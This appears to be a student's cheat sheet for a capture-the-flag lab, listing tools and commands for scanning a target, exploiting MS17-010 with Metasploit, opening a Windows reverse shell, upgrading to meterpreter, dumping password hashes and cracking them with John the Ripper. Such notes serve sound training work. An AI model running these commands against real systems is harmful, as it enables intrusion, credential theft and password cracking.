Tools:
1: nmap
2: metasploit
3: OpenVpn
4: Vim
5: shell_to_meterpreter

Commands:
nmap -sV -vv --script vuln TARGET_IP
msfconsole
show options
set payload windows/x64/shell/reverse_tcp
run
sessions -l
sessions 1
shell
whoami
migrate PROCESS_ID
hashdump
set LHOST IP
set RHOSTS IP
sudo openvpn /path/file.ovpn
search ms17-010
search shell_to
use module
ps
vim hashes.txt
sudo gzip -d /usr/share/wordlists/rockyou.txt.gz
sudo john --format=NT --wordlist=/usr/share/wordlists/rockyou.txt
